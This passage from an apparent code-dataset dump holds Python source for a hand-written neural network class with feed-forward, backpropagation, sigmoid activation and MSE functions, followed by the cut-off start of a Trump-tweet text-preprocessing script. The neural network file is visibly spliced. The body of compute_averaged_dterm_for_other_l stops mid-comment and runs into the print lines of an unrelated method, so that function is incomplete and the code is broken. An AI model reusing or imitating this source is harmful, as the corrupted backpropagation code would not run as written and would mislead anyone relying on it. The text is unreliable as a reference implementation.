Mode = \", mode)\n\t\tif mode is None:\n\t\t\tweights = bulk[\"weights\"]\n\t\t\tbiases = bulk[\"biases\"]\n\t\t\tself.initiate_neural_network_general(weights, biases,\n\t\t\t\tverbose=verbose_init_mode,\n\t\t\t\tverbose_consistency=verbose_consistency)\n\t\t# elif mode == \"uniform\":\n\t\t# \tinitial_value = bulk[\"initial_value\"]\n\t\t# \tneuron_number = bulk[\"neuron_number\"]\n\n\t\treturn\n\n\t# NN.L2\n\tdef initiate_neural_network_general(self,weights, biases,\n\t\tverbose=False,\n\t\tverbose_consistency=False):\n\t\tif verbose>0 : print(\" -+ initiate_neural_network_general().\")\n\t\t# ---------------------------------------\n\t\t# Initialize weights and biases manually\n\t\t# weights : see the format in __init__(self)\n\t\t# biases : see the format in __init__(self)\n\t\tis_consistent, number_of_neurons = self.neuron_number_consistency_check(weights, biases,\n\t\t\tverbose=verbose_consistency)\n\t\tself.number_of_neurons = number_of_neurons\n\t\tself.number_of_input = number_of_neurons[0]\n\t\tself.number_of_output = number_of_neurons[-1]\n\t\tself.is_consistent = is_consistent\n\n\t\tself.weights = weights\n\t\tself.biases = biases\n\t\treturn\n\n\t# NN.L3\n\tdef neuron_number_consistency_check(self, weights, biases, verbose=False):\n\t\t# ---------------------------------------\n\t\t# weights : see the format in __init__(self)\n\t\t# biases : see the format in __init__(self)\n\t\t# return\n\t\t# is_consistent : bool, if true, then the inputs are compatible as Neural Network\n\t\t# number_of_neurons : list [n1,n2,...nL], number of neurons in layer 1 to L,\n\t\t# where layer 1 is the input layer and layer L the output layer\n\t\tis_consistent = True\n\t\tnumber_of_neurons = []\n\t\tif verbose>0: print(\" --+ neuron_number_consistency_check().\") \n\t\tn_layer = 2\n\t\tfor w_l in weights:\n\t\t\tis_matrix_bool, row_size, col_size = ut.list_is_matrix(w_l)\n\t\t\tif verbose>10: print(\" layer: \", n_layer-1, \" to \", n_layer)\n\t\t\tif verbose>10: print(\" is_matrix/row/col = \", is_matrix_bool,\"/\", row_size,\"/\", col_size)\n\t\t\tif not is_matrix_bool:\n\t\t\t\tprint(\" inconsistent weight matrix found [1]. Exiting with:\")\n\t\t\t\treturn False, []\n\t\t\tif n_layer == 2:\n\t\t\t\tnumber_of_neurons = number_of_neurons + [col_size, row_size]\n\t\t\telse:\n\t\t\t\tif number_of_neurons[-1] != col_size:\n\t\t\t\t\tprint(\" inconsistent weight matrix found [2]. Exiting.\")\n\t\t\t\t\tif verbose>10: print(\" \", number_of_neurons,\" || \", col_size)\n\t\t\t\t\treturn False, []\n\t\t\t\tnumber_of_neurons = number_of_neurons + [row_size]\n\t\t\tn_layer = n_layer + 1\n\t\tnumber_of_neurons_2 = []\n\t\tfor b_l in biases:\n\t\t\tnumber_of_neurons_2 = number_of_neurons_2 + [len(b_l)]\n\t\tif len(number_of_neurons_2)+1==len(number_of_neurons):\n\t\t\tfor j in range(1,len(number_of_neurons)):\n\t\t\t\tif number_of_neurons[j] != number_of_neurons_2[j-1]:\n\t\t\t\t\tprint(\" inconsistent weight-bias dimensions [2]. Exiting.\")\n\t\t\t\t\tif verbose>10: print(\" 1. \", number_of_neurons)\n\t\t\t\t\tif verbose>10: print(\" 2. \", number_of_neurons_2)\n\t\t\t\t\treturn False, []\n\t\telse:\n\t\t\tprint(\" inconsistent weight-bias dimensions [1]. Exiting.\")\n\t\t\tif verbose>10: print(\" 1. \", number_of_neurons)\n\t\t\tif verbose>10: print(\" 2. 
\", number_of_neurons_2)\n\t\t\treturn False, []\n\t\treturn is_consistent, number_of_neurons\n\t# NN.Ex.L1\n\tdef print_neural_network_information(self,verbosity=1):\n\t\tprint(\" > print_neural_network_verbose_information().\")\n\t\t# is_consistent, number_of_neurons=self.neuron_number_consistency_check(self.weights, self.biases, verbose=False)\n\t\t \n\t\tprint(\" Dimension consistent? :\", self.is_consistent)\n\t\tprint(\" Layers? [Input, 2,3,..., Output] :\", self.number_of_neurons)\n\t\tif verbosity>5: print(\" -> no of input/output = \",self.number_of_input,\"/\", self.number_of_output)\n\t\tprint(\" Learning rate : \",self.learning_rate)\n\t\tif verbosity>0:\n\t\t\t# TODO: add more information\n\t\t\tpass\n\t\treturn\n\t# NN.Ex.L2\n\n\nclass NetworkUpdater():\n\tdef __init__(self):\n\t\tself.current_weights = None # (list, not in numpy matrix)\n\t\tself.current_biases = None # (list)\n\t\tself.learning_rate = None # (float)\n\t\tself.number_of_neurons = None # list [N1,N2,...,NL]\n\t\tself.number_of_input = None # number_of_neurons[0]\n\t\tself.number_of_output = None # number_of_neurons[-1]\n\t\t#------------------------------------------------------------\n\t\t# These properties are the same as that of NeuralNetwork\n\n\t\tself.input_set = None \n\t\tself.Y0_set = None \n\t\t#------------------------------------------------------------\n\t\t# input_set :\n\t\t# - list of numpy matrix [x]. Each x a column vector m x 1, m the number of neurons in input layer.\n\t\t# Y0_set :\n\t\t# - list of numpy matrix [Y0]. Each Y0 nx1, where n is the no of neurons in layer l=L\n\t\t# The true/observed values in the output layer corresponding to the input set.\n\t\t# In another words, for each k=1,...,N, Y0_set[k] = f(x[k]) where f is the true function that\n\t\t# our neural network is modelling and N the number of data points.\n\n\t\tself.method = \"RegularStochastic\"\n\t\tself.method_specific_settings = None # (dictionary)\n\t\t\n\t\treturn\n\n\t# NU.L1\n\n\tdef update_wb(self, input_set, Y0_set, weights, biases, AF,\t\n\t\tmse_mode=\"compute_only\",\t\n\t\tverbose=False):\n\n\t\t#----------------------------------------\n\t\t# weights : the collection of weights in the neural network\n\t\t# weights is a list [w_l], where w_l is the collection of weights between \n\t\t# the (l-1)-th and l-th layer\n\t\t# for l=2,3,...,L where l=1 is the input layer, l=2 the first hidden layer\n\t\t# and l=L is the output layer\n\t\t# w_l is a matrix (list of list)\n\t\t# so that w_l[i][j] is the weight between neuron j at layer l-1 and \n\t\t# neuron i at layer l \n\t\t# biases : the collection of biases in the neural network\n\t\t# biases is a list [b_l], where b_l is the collection of biases in the l-th layer\n\t\t# for l=2,3,...,L\n\t\t# input_set : list of numpy matrix [x]. 
Each x a column vector m x 1, m the number of neurons in input layer \n\t\t# AF : activationFunction object\n\n\t\t# mse_mode\n\t\t# None: do not compute mse at all\n\t\t# \"compute_only\" : \n\t\t# \"compute_and_print\" : \n\n\t\t# back-propagation\n\t\t# Assume the following have been called:\n\t\t# set_training_data()\n\t\t# set_neural_network()\n\t\t# set_settings()\n\n\t\tprint(\" + update_wb().\")\n\t\tmse_list = []\n\t\t\n\t\tif mse_mode is not None:\n\t\t\tY_set = []\n\t\t\tn = len(input_set)\n\t\t\tfor j in range(n): # for each data point\n\t\t\t\ta_l_set, _ = self.feed_forward( weights, biases, input_set[j], AF,\n\t\t\t\t\t\t\t\t\tverbose=False,\n\t\t\t\t\t\t\t\t\tmatrix_formatting=\"%6.2f\")\n\t\t\t\tY_set.append(a_l_set[-1])\n\t\t\tcurrent_mse = MSE(Y_set,Y0_set)\n\t\t\tmse_list.append(current_mse)\n\t\t\tif mse_mode == \"compute_and_print\":\t\n\t\t\t\tprint(\" Initial mse = \",current_mse)\t\n\n\t\tweights_next = weights[:]\n\t\tbiases_next = biases[:]\n\n\t\tif self.method==\"RegularStochastic\":\n\t\t\tbatch_size = self.method_specific_settings[\"batch_size\"]\n\t\t\tno_of_epoch = self.method_specific_settings[\"no_of_epoch\"]\n\t\t\tdo_shuffle = self.method_specific_settings[\"shuffle_batch\"]\n\t\t\tif verbose>20:\n\t\t\t\tprint(\" batch size = \",batch_size)\n\t\t\t\tprint(\" no of epoch = \", no_of_epoch)\n\t\t\t\tprint(\" shuffle batch = \", do_shuffle)\n\t\t\t\n\t\t\tfor epoch_i in range(no_of_epoch):\n\t\t\t\tif verbose>20: print(\" epoch : \", epoch_i+1)\n\t\t\t\tcollection_of_batches, index_partition = ut.partition_list(input_set, batch_size, do_shuffle=do_shuffle )\n\t\t\t\tpartition_of_Y0_set, _ = ut.partition_list(Y0_set, index_partition)\n\n\t\t\t\tif verbose>30:\n\t\t\t\t\tfor xx,yy in zip(collection_of_batches, partition_of_Y0_set):\n\t\t\t\t\t\t# \tprint(xx,\"\\n\",yy)\n\t\t\t\t\t\tprint(\" * partition size consistency check: \", len(xx),\" and \",len(yy))\n\t\t\t\t\t\tprint(\" * --------------------------------------\")\n\t\t\t\t\t\n\t\t\t\tfor i in range(len(collection_of_batches)):\n\t\t\t\t\t# Recall: each batch (list of numpy matrix) is a subset of input_set\n\t\t\t\t\tinput_set_batch = collection_of_batches[i] # is input_set - like\n\t\t\t\t\tY0_set_batch = partition_of_Y0_set[i]\n\t\t\t\t\tif verbose>40: \n\t\t\t\t\t\tprint(\" batch \", i, \" : \")\n\t\t\t\t\t#print(\" input_set_batch :\\n\",input_set_batch)\n\t\t\t\t\t\n\t\t\t\t\tfor x in input_set_batch:\n\t\t\t\t\t\t# Recall: each x (numpy matrix) is an element of input_set\n\t\t\t\t\t\tif verbose>30:\n\t\t\t\t\t\t\tut.print_numpy_matrix(x,formatting=\"%6.2f\",no_of_space=10)\n\t\t\t\t\t\t\tprint(\" -------\")\n\t\t\t\t\tweights_next, biases_next = self.update_wb_regular_stochastic(input_set_batch, Y0_set_batch,\n\t\t\t\t\t\tweights_next, biases_next, AF)\n\n\t\t\t\t# for accuracy measurement\n\t\t\t\t# Y0_set :list of numpy matrix over all data points\n\t\t\t\tif mse_mode is not None:\n\t\t\t\t\tY_set_next = []\n\t\t\t\t\tn = len(input_set)\n\t\t\t\t\tfor j in range(n): # for each data point\n\t\t\t\t\t\ta_l_set_next, _ = self.feed_forward( weights_next, biases_next, input_set[j], AF,\n\t\t\t\t\t\t\t\t\t\t\tverbose=False,\n\t\t\t\t\t\t\t\t\t\t\tmatrix_formatting=\"%6.2f\")\n\t\t\t\t\t\tY_set_next.append(a_l_set_next[-1])\n\t\t\t\t\tcurrent_mse = MSE(Y_set_next,Y0_set)\n\t\t\t\t\tmse_list.append(current_mse)\n\t\t\t\t\tif mse_mode == \"compute_and_print\":\t\n\t\t\t\t\t\tprint(\" current_mse = \",current_mse)\n\n\t\treturn weights_next, biases_next, mse_list\n\n\tdef set_settings(self, 
method=\"RegularStochastic\",\n\t\tmethod_specific_settings={\"batch_size\":4,\"no_of_epoch\":1}):\n\t\t# List all available methods here\n\t\t#\n\t\t# method = \"RegularStochastic\"\n\t\t# method_specific_settings:\n\t\t# batch_size: (integer)\n\t\t# no_of_epoch: (integer)\n\t\t# shuffle_batch : (bool)\n\t\t#------------------------------------------------------------\n\t\t# Given n data points. Partition to m = ceil(n/batch_size) batches\n\t\t# For every update wb_n to wb_(n+1), average the contribution to gradient descent\n\t\t# for all batches\n\t\t#\tIn this implementation, 1 epoch is 1 update\n\t\tself.method = method\n\t\tself.method_specific_settings = method_specific_settings\n\t\treturn\n\n\tdef set_training_data(self,input_set,Y0_set):\n\t\t# See __init__() for arguments explanations\n\t\tself.input_set = input_set\n\t\tself.Y0_set = Y0_set\n\t\treturn\n\n\tdef set_neural_network(self, NeuralNetwork):\n\t\t# NeuralNetwork (NeuralNetwork): assume initiated, with weights and biases\n\t\t# i.e. assume initiate_neural_network_general() has been called successfully\n\t\tself.current_weights = NeuralNetwork.weights\n\t\tself.current_biases = NeuralNetwork.biases\t\n\n\t\tself.learning_rate = NeuralNetwork.learning_rate\n\n\t\tself.number_of_neurons = NeuralNetwork.number_of_neurons\n\t\tself.number_of_input = NeuralNetwork.number_of_input\n\t\tself.number_of_output = NeuralNetwork.number_of_output\n\t\treturn\n\n\t# NU.L2\n\n\tdef update_wb_regular_stochastic(self, input_set, Y0_set,\n\t\tweights, biases, AF,\t\t\n\t\tverbose=False,\n\t\tverbose_feed_forward=False,\n\t\tverbose_compute_diff=False,\n\t\tverbose_delta_L=False,\n\t\tverbose_compute_delta=False):\n\t\tif verbose>0: print(\" -+ update_wb_regular_stochastic().\")\n\t\t#----------------------------------------\n\t\t# weights : the collection of weights in the neural network\n\t\t# weights is a list [w_l], where w_l is the collection of weights between \n\t\t# the (l-1)-th and l-th layer\n\t\t# for l=2,3,...,L where l=1 is the input layer, l=2 the first hidden layer\n\t\t# and l=L is the output layer\n\t\t# w_l is a matrix (list of list)\n\t\t# so that w_l[i][j] is the weight between neuron j at layer l-1 and \n\t\t# neuron i at layer l \n\t\t# biases : the collection of biases in the neural network\n\t\t# biases is a list [b_l], where b_l is the collection of biases in the l-th layer\n\t\t# for l=2,3,...,L\n\t\t# input_set :list of numpy matrix [x]. 
Each x a column vector m x 1, m the number of neurons in input layer\n\t\t# Y0_set :list of numpy matrix over all data points\n\t\t# AF : activationFunction object\n\n\t\tn = len(input_set)\n\t\tL = len(weights) + 1\n\t\tbackprop_label = range(2,L+1)\n\t\tbackprop_label = [ backprop_label[-1-i] for i in range(len(backprop_label))]\n\t\t#-------------------------------------------------\n\t\t# for example if there are L=6 layers, this will be [6,5,4,3,2]\n\n\t\tcollection_a_l_set = [] # over all data points\n\t\tcollection_z_l_set = []\n\t\tfor j in range(n): # for each data point\n\t\t\ta_1 = input_set[j]\n\t\t\ta_l_set, z_l_set = self.feed_forward( weights, biases, a_1, AF,\n\t\t\t\t\t\t\tverbose=verbose_feed_forward,\n\t\t\t\t\t\t\tmatrix_formatting=\"%6.2f\")\n\t\t\tcollection_a_l_set.append(a_l_set)\n\t\t\tcollection_z_l_set.append(z_l_set) # collection of z_l_set over all data points\n\t\tY_set = [ a_l_set[-1] for a_l_set in collection_a_l_set]\n\n\t\tweights_next = [] # list [w_2,...,w_L] where each w_k is a list of list a matrix\n\t\tbiases_next = []\n\n\t\tfor i in range(len(backprop_label)): # for each layer\n\t\t\t# for regular_stochastic, at each l, compute average over data points\n\t\t\t# note that weights = [w_2,w_3,...,w_L] so the corresponding index [0,1,..,l-2,...,L-2]\n\t\t\tl = backprop_label[i]\n\t\t\tmax_i = len(backprop_label)-1\n\t\t\tif l == L:\n\t\t\t\tif verbose>10:\n\t\t\t\t\tprint(\" Layer (Output): \",backprop_label[i], \" || i = \", i,\"/\",max_i)\n\t\t\t\taverage_dterm_at_L, average_delta_at_L , CDLADP , CdLADP = self.compute_averaged_dterm_for_L(\n\t\t\t\t\tn, input_set, Y_set, Y0_set, AF,\n\t\t\t\t\tcollection_z_l_set, collection_a_l_set,\n\t\t\t\t\tverbose_delta_L=verbose_delta_L,\n\t\t\t\t\tverbose_compute_diff=verbose_compute_diff)\n\t\t\t\t# average_dterm_at_l (numpy matrix)\n\t\t\t\tCDlp1ADP = CDLADP\n\t\t\t\tCdlp1ADP = CdLADP\n\t\t\t\tw_l = np.matrix(weights[-1])\n\t\t\t\tw_l_next = w_l - self.learning_rate * average_dterm_at_L\n\t\t\t\tb_l = np.transpose(np.matrix(biases[-1]))\n\t\t\t\tb_l_next = b_l - self.learning_rate * average_delta_at_L\n\t\t\telse:\n\t\t\t\tif verbose>10:\n\t\t\t\t\tprint(\" Layer: \",backprop_label[i], \" || i = \", i,\"/\",max_i)\n\t\t\t\tw_l_plus_1 = weights[l-2 + 1]\n\t\t\t\taverage_dterm_at_l, average_delta_at_l , CDlADP , CdlADP = self.compute_averaged_dterm_for_other_l( \n\t\t\t\t\tl, n, w_l_plus_1, Cdlp1ADP, collection_a_l_set, collection_z_l_set, AF,\n\t\t\t\t\tverbose=False,\n\t\t\t\t\tverbose_compute_diff=verbose_compute_diff,\n\t\t\t\t\tverbose_compute_delta=verbose_compute_delta)\n\t\t\t\t# average_delta_at_l (numpy matrix)\n\t\t\t\tCDlp1ADP = CDlADP\n\t\t\t\tCdlp1ADP = CdlADP\n\t\t\n\t\t\t\tw_l = np.matrix(weights[-1 - i])\n\t\t\t\tw_l_next = w_l - self.learning_rate * average_dterm_at_l\n\t\t\t\tb_l = np.transpose(np.matrix(biases[-1-i]))\n\t\t\t\tb_l_next = b_l - self.learning_rate * average_delta_at_l\n\t\t\tweights_next.insert(0, ut.numpy_matrix_to_list(w_l_next))\n\t\t\tbiases_next.insert(0, ut.numpy_matrix_to_list(b_l_next))\n\n\t\treturn weights_next, biases_next\n\n\tdef compute_differential_term_at_l_per_data_point(self, delta_l, a_l_minus_1,\n\t\tverbose=False):\n\t\t# differential terms here defined as delta^l times transpose of a^(l-1)\n\t\t# delta_l (numpy matrix): vector of size m x 1, where m is no of neurons at layer l\n\t\t# a_l_minus_1 (numpy matrix): m x 1 vector, signals from layer l-1\n\t\tif verbose>0: print(\" -+ compute_differential_term_at_l_per_data_point().\")\n\t\tdterm = 
np.matmul(delta_l,np.transpose(a_l_minus_1))\n\t\t# dterm (numpy matrix)\n\t\treturn dterm\n\n\tdef compute_delta_l_per_data_point(self, w_l_plus_1, delta_l_plus_1, z_l, AF,\n\t\tverbose=False,\n\t\tprint_format=\"%6.8f\"):\n\t\tif verbose>0: print(\" -+ compute_differential_term_at_l().\")\n\t\t# recursive formula to compute d_l for all l except l=L\n\t\t#-----------------------------------------------\n\t\t# w_l_plus_1 (list): matrix of size m x n, weights between layer l and l+1\n\t\t# delta_l_plus_1 (numpy matrix): vector of size m x 1, where m is no of neurons at layer l+1\n\t\t# z_l (numpy matrix): vector of size m x 1, m no of neurons at layer m\n\t\t# this is w_l . a_l_minus_1 + b_l\n\t\t# return\n\t\t# delta_l (numpy matrix): vector of size m x 1, where m is no of neurons at layer l\n\t\tif verbose>5: \n\t\t\tprint(\" np.array(w_l_plus_1).shape = \",np.array(w_l_plus_1).shape)\n\t\ttemp = np.matmul(np.transpose(np.matrix(w_l_plus_1)),delta_l_plus_1)\n\t\ttemp2 = [AF.afp(z_l.item(i)) for i in range(len(z_l))]\n\t\tif not (len(temp)==len(temp2)):\n\t\t\tprint(\" -+ compute_delta_l(). Error, inconsistent dimensions. return None.\")\n\t\t\treturn None\n\t\tdelta_l = []\n\t\tfor i in range(len(temp)):\n\t\t\tdelta_l.append(temp.item(i)*temp2[i])\n\t\tdelta_l = np.transpose(np.matrix(delta_l))\n\t\tif verbose>10:\n\t\t\tprint(\" delta_l = \") \n\t\t\tut.print_numpy_matrix(delta_l,formatting=print_format,no_of_space=10)\n\t\treturn delta_l\n\n\tdef compute_delta_L_per_data_point(self, z_L, Y0, Y_set, Y0_set, AF,\n\t\tverbose=False,\n\t\tprint_format=\"%6.8f\"):\t\n\t\tif verbose>0: print(\" -+ compute_delta_L_per_data_point()\")\t\n\n\t\t# a single data point:\n\t\t# z_L (numpy matrix) is a vector: output data computed from NN before activation\n\t\t# Y0 (numpy matrix) is a vector: observed/true output data. \n\t\t# Still, we are minimizing MSE over the entire set of data points\n\t\t# Y_set and Y0_set are respectively the collection of NN-computed and true/observed data points\n\t\t#\n\t\t# Assume a_L and Y0 have the same size\n\t\t# Assume Y_set and Y0_set have the same size\n\t\t# Assume all entries of a_L and Y0 are real\n\t\t# AF (activationFunction). Assume it is initiated.\n\t\t# return\n\t\t# delta_L (numpy matrix)\n\t\t\n\t\tnabla_mse = nabla_MSE(Y_set,Y0_set) \n\t\t#-----------------------------------\n\t\t# (numpy matrix) a vector of size m, m the number of neurons in layer L\n\t\ttemp = [AF.afp(z_L.item(i)) for i in range(len(z_L))]\n\t\t#-----------------------------------\n\t\t# \n\n\t\tdelta_L = []\n\t\tif not (len(nabla_mse)==len(temp)):\n\t\t\traise ValueError(\" -+ compute_delta_L(). Error, inconsistent dimensions. 
Return None.\")\n\t\t\treturn None\n\t\tfor i in range(len(nabla_mse)):\n\t\t\tdelta_L.append(nabla_mse.item(i)*temp[i])\n\t\tdelta_L = np.transpose(np.matrix(delta_L))\n\t\tif verbose>10: \n\t\t\tprint(\" delta_L = \") \n\t\t\tut.print_numpy_matrix(delta_L,formatting=print_format,no_of_space=10)\n\t\treturn delta_L\n\n\t# NU.L3\n\n\tdef feed_forward(self, weights, biases, a_1, AF,\n\t\tverbose=False,\n\t\tmatrix_formatting=\"%6.2f\"):\n\t\tif verbose>0: print(\" --+ feed_forward()\")\n\t\t#----------------------------------------\n\t\t# weights : the collection of weights in the neural network\n\t\t# weights is a list [w_l], where w_l is the collection of weights between \n\t\t# the (l-1)-th and l-th layer\n\t\t# for l=2,3,...,L where l=1 is the input layer, l=2 the first hidden layer\n\t\t# and l=L is the output layer\n\t\t# w_l is a matrix (list of list)\n\t\t# so that w_l[i][j] is the weight between neuron j at layer l-1 and \n\t\t# neuron i at layer l \n\t\t# biases : the collection of biases in the neural network\n\t\t# biases is a list [b_l], where b_l is the collection of biases in the l-th layer\n\t\t# for l=2,3,...,L\n\t\t# a_1 : (numpy matrix) input layer \n\t\t# AF (activationFunction). Assume it is initiated.\n\n\t\t# matrix_print_raw_style (bool). If true, then matrix is printed as is\n\t\t# if false, then matrix is printed with padding.\n\n\t\t# return\n\t\t# a_l_set\n\t\t# (list) [a_l] for l = 1, 2, ..., L, [l=1 is input, l=L is output]\n\t\t# each a_l (numpy matrix) m x 1 vector, where m is no of neurons in layer l\n\t\t# z_l_set\n\t\t# (list) [z_l] for l = 1, 2, ..., L, [l=1 is input, l=L is output]\n\t\t# each z_l (numpy matrix) m x 1 vector, where m is no of neurons in layer l\n\t\t# \n\t\t# Note: each entry a_l[k] is just the corresponding entry z_l[k] with\n\t\t# activation function applied\n\t\t# Note: a_1 == z_1\n\n\t\ta_l_set = [a_1]\n\t\tz_l_set = [a_1]\n\t\tN_layer_minus_1 = len(weights)\n\t\tif not (N_layer_minus_1 == len(biases)):\n\t\t\tprint(\" Error.Dimension of weights and biases inconsistent.\")\n\t\tfor i in range(N_layer_minus_1):\n\t\t\ta_l_minus_1 = a_l_set[-1]\n\t\t\tw_l = np.matrix(weights[i])\n\t\t\tb_l = np.transpose(np.matrix(biases[i]))\n\t\t\tif verbose>20: \n\t\t\t\tprint(\" ------------------------------------\")\n\t\t\t\tprint(\" layer \",i, \"to layer\", i+1)\n\t\t\t\tprint(\" w_l = \" )\n\t\t\t\tut.print_numpy_matrix(w_l,formatting=matrix_formatting,no_of_space=20)\n\t\t\t\tprint(\" a_l_minus_1 = \")\n\t\t\t\tut.print_numpy_matrix(a_l_minus_1,formatting=matrix_formatting,no_of_space=20)\n\t\t\t\tprint(\" b_l = \")\n\t\t\t\tut.print_numpy_matrix(b_l,formatting=matrix_formatting,no_of_space=20)\n\t\t\tz_l = np.matmul(w_l,a_l_minus_1) + b_l\n\t\t\tz_l_set.append(z_l)\n\t\t\ta_l_act = []\n\t\t\tfor i in range(len(z_l)):\n\t\t\t\tif verbose>30 : print(\" -> \",i, \" : \", z_l.item(i), \" : \",AF.af(z_l.item(i)))\n\t\t\t\ta_l_act.append(AF.af(z_l.item(i)))\n\t\t\ta_l_act = np.transpose(np.matrix(a_l_act))\t\n\t\t\tif verbose>20 : \n\t\t\t\tprint(\" a_l_act = \") \n\t\t\t\tut.print_numpy_matrix(a_l_act,formatting=matrix_formatting,no_of_space=20)\n\t\t\ta_l_set.append(a_l_act)\n\t\t\t\n\t\treturn a_l_set, z_l_set\n\n\t# NU.L4\n\n\tdef compute_z_j_at_layer_l(self, a_l_minus_1, w_l, b_l, \n\t\tverbose=False):\n\t\tif verbose>0: print(\" ---+ compute_z_j_at_layer_l().\")\n\t\t# w_L (numpy matrix) is a matrix, weights between layers L-1 and L\n\t\t# b_L (numpy matrix) is a vector, biases at layer L\n\t\t# a_L_minus_1 (numpy matrix) is a vector, signal 
from layer L-1\n\t\tz_j_at_layer_l = np.matmul(w_l,a_l_minus_1) + b_l\n\t\treturn z_j_at_layer_l\n\n\tdef compute_averaged_dterm_for_other_l(self, l, n, w_l_plus_1, Cdlp1ADP, \n\t\tcollection_a_l_set, collection_z_l_set, AF,\n\t\tverbose=False,\n\t\tverbose_compute_diff=False,\n\t\tverbose_compute_delta=False):\n\n\t\t# dterm is just a convenient name for update terms for w. Effectively this\n\t\t# function computes the update term for l as well.\n\n\t\t# l (int): for update in layer l print_neural_network_verbose_information().\")\n\t\tprint(\" Current weights size = \", len(self.current_weights) ) # (list, not in numpy matrix)\n\t\tprint(\" Current biases size = \", len(self.current_biases) ) # (list)\n\t\tprint(\" learning_rate = \",self.learning_rate )# (float)\n\t\tprint(\" number_of_neurons = \",self.number_of_neurons ) # list [N1,N2,...,NL]\n\t\tprint(\" number_of_input (no of neurons in input layer) = \",self.number_of_input ) # number_of_neurons[0]\n\t\tprint(\" number_of_output (no of neurons in output layer) = \",self.number_of_output) # number_of_neurons[-1]\n\t\tprint(\" size of input_set = \",len(self.input_set) )\n\t\tprint(\" size of Y0_set = \",len(self.Y0_set) )\n\t\tprint(\" method = \",self.method )\n\t\tprint(\" method_specific_settings = \",self.method_specific_settings) # (dictionary)\n\t\treturn\n\t\t\n\nclass activationFunction:\n\tdef __init__(self, func = \"Sigmoid\"):\n\t\tself.af = None # activation function\n\t\tself.afp = None # first derivative of activation function, p for prime\n\t\tself.select_activation_function(func)\n\t\treturn\n\n\tdef select_activation_function(self, func):\n\t\tif func == \"Sigmoid\":\n\t\t\tself.af = lambda x: 1/(1+np.exp(-x))\n\t\t\tself.afp = lambda x: 1/(1+np.exp(-x)) * (1- 1/(1+np.exp(-x)))\n\t\telse:\n\t\t\t# In any other exceptional cases, set to Sigmoid function\n\t\t\tself.af = lambda x: 1/(1+np.exp(-x))\n\t\t\tself.afp = lambda x: 1/(1+np.exp(-x)) * (1- 1/(1+np.exp(-x)))\n\t\treturn\n\n\n# Static functions\ndef MSE(Y_set,Y0_set):\n\t# Y_set is a list of Y\n\t# Y0_set is a list of Y0\n\t# Assume Y_set and Y0_set have the same size, otherwise error will be raised\n\t#\n\t# Y (numpy matrix) is a vector: computed data from model\n\t# Y0 (numpy matrix) is a vector: observed/true data\n\t# Assume Y and Y0 have the same size, otherwise error will be raised\n\t# Assume all entries are real\n\t\n\tmse = 0\n\tn = len(Y_set)\n\tif not (n==len(Y0_set)):\n\t\tprint(\"MSE(). Error. Inconsistent dimension between Y_set and Y0_set. Return nothing.\")\n\t\treturn\t\n\tfor i in range(n):\n\t\tY = Y_set[i]\n\t\tY0 = Y0_set[i]\n\t\tNout1 = len(Y.tolist())\n\t\tNout2 = len(Y0.tolist())\n\t\tif not (Nout1==Nout2):\n\t\t\tprint(\"MSE(). Error. Inconsistent dimension between Y and Y0. 
Return nothing.\")\n\t\t\treturn\n\t\t# now compute the norms between true and model output values\n\t\tfor j in range(Nout1):\n\t\t\tmse = mse + (np.abs(Y0.item(j)-Y.item(j)))**2\n\tmse = mse / (2*n)\n\n\treturn mse\n\ndef nabla_MSE(Y_set,Y0_set):\n\t# Y_set is a list of Y\n\t# Y0_set is a list of Y0\n\t# Assume Y_set and Y0_set have the same size, otherwise error will be raised\n\t#\n\t# gradient of MSE wrt a_L\n\t# Y (numpy matrix) is a column vector: computed output from model\n\t# Y0 (numpy matrix) is a column vector: observed/true data\n\t# Assume Y and Y0 have the same size, otherwise error will be raised\n\t# Assume all entries are real\n\tn = len(Y_set)\n\tif not (n==len(Y0_set)):\t\n\t\tprint(\" >> Y_set size = \",len(Y_set))\n\t\tprint(\" >> Y0_set size = \",len(Y0_set))\n\t\traise ValueError(\"nabla_MSE(). Error. Inconsistent dimension between Y_set and Y0_set.\")\n\tnabla_mse = None\n\tfor i in range(n):\n\t\tY = Y_set[i] # numpy matrix\n\t\tY0 = Y0_set[i]\n\t\tif i == 0 :\n\t\t\tnabla_mse = Y-Y0\n\t\telse:\n\t\t\tnabla_mse = nabla_mse + Y-Y0\n\tnabla_mse = nabla_mse/n \n\treturn nabla_mse","sub_path":"kero/multib/NeuralNetwork.py","file_name":"NeuralNetwork.py","file_ext":"py","file_size_in_byte":30258,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"27580231","text":"'''Preprocessing of the raw data extracted from the Trump Twitter Archive (all tweets from 2018 downloaded as json).'''\n\nimport json\nimport re # This module is used to convert strings into word lists\nimport nltk # Natural Language Processing module\nfrom nltk.corpus import stopwords # Stopwords. Use nltk.download('stopwords') if\n # the dictionary was not previously downloaded\n\n# Different stemming modules\nfrom nltk.stem import PorterStemmer\nfrom nltk.stem.snowball import SnowballStemmer\nfrom stemming.porter2 import stem\n\n# Parameters:\nrm_stopwords = True # Set to True to remove stopwords and digits\nstemming = True # Set to True to stem words\nall_lowercase = True # Set to True to make all words lowercase\nN = None # Number of raw tweets to consider. Set to None to use all of them.\n\n#--------------------------------------------------------\n# Read raw data\n#--------------------------------------------------------\nprint(\"---------- Reading data... ----------\")\nwith open('data/raw_Trump_2018_tweets.json') as json_data_file:\n data = json.load(json_data_file) # This is a list of dictionaries\nif not N:\n N = len(data)\nprint(\"%d tweets successfully read\" % N)\n\n# Create a list of sub-lists. Each of the sub-lists contains all the words from a tweet,\n# with no punctuation signs. The chronological order of tweets is respected.\ntweets = []\nfor i in range(0,N):\n # Substitute symbols (@,#,&,$) by '0' in order to remove hashtags, usernames and\n # other text that is not a word per se. Then we will eliminate any string containing\n # a number. Example: we transform @POTUS into 0POTUS and we will remove it later.\n data[i]['text'] = re.sub(\"@\",\"0\",data[i]['text'])\n data[i]['text'] = re.sub(\"#\",\"0\",data[i]['text'])\n data[i]['text'] = re.sub(\"&\",\"0\",data[i]['text'])\n data[i]['text'] = re.sub(\"\\\\$\",\"0\",data[i]['text']) # '$' must be escaped: unescaped it matches end-of-string, not the dollar sign\n data[i]['text'] = re.sub(\"/\",\"0\",data[i]['text'])\n data[i]['text'] = re.sub(\"\\\\\\\\\",\"0\",data[i]['text'])\n\n tweets.append(re.sub(\"[^\\w]\", \" \", data[i]['text']).split()) # [ ]=set, ^=not in, \\w=a-z0-9A-Z\n\n#--------------------------------------------------------\n# Remove stopwords and digits\n#--------------------------------------------------------\nif rm_stopwords:\n # First, we include 'amp' in the stopwords. This appears in substitution of &.\n # We also include 'rt', which is used as indicator of retweet.\n # We also include 'https', which is used for URLs\n 